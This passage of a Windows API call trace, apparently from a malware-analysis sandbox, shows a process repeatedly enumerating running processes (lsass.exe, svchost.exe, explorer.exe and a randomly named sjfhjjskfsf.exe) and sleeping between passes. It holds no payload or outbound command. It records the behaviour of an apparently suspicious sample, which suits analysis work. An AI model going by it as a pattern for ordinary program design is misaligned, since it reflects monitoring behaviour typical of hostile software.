lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.020] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.020] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.020] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.021] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.021] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.021] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.022] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.022] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.022] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.023] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.023] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.023] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.024] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.024] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.024] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.025] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.025] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.025] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.026] Sleep (dwMilliseconds=0x64) [0218.134] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c0 [0218.136] Process32FirstW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.137] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.137] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.137] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.138] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.138] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.138] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.139] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.139] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.139] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.140] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.140] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.140] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.141] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.141] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.141] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.141] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.142] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.142] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.142] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.143] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.143] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.143] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.144] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.144] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.144] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.145] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.145] Process32NextW (in: hSnapshot=0x1c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.145] Sleep (dwMilliseconds=0x64) [0218.243] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c4 [0218.245] Process32FirstW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.245] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.246] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.246] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.246] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.247] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.249] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.249] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.249] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.250] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.250] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.250] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.251] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.251] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.251] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.252] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.252] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.252] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.253] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.253] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.253] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.253] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.254] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.254] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.254] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.255] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.255] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.255] Process32NextW (in: hSnapshot=0x1c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.256] Sleep (dwMilliseconds=0x64) [0218.368] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c8 [0218.369] Process32FirstW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.370] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.370] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.370] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.371] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.371] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.371] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, 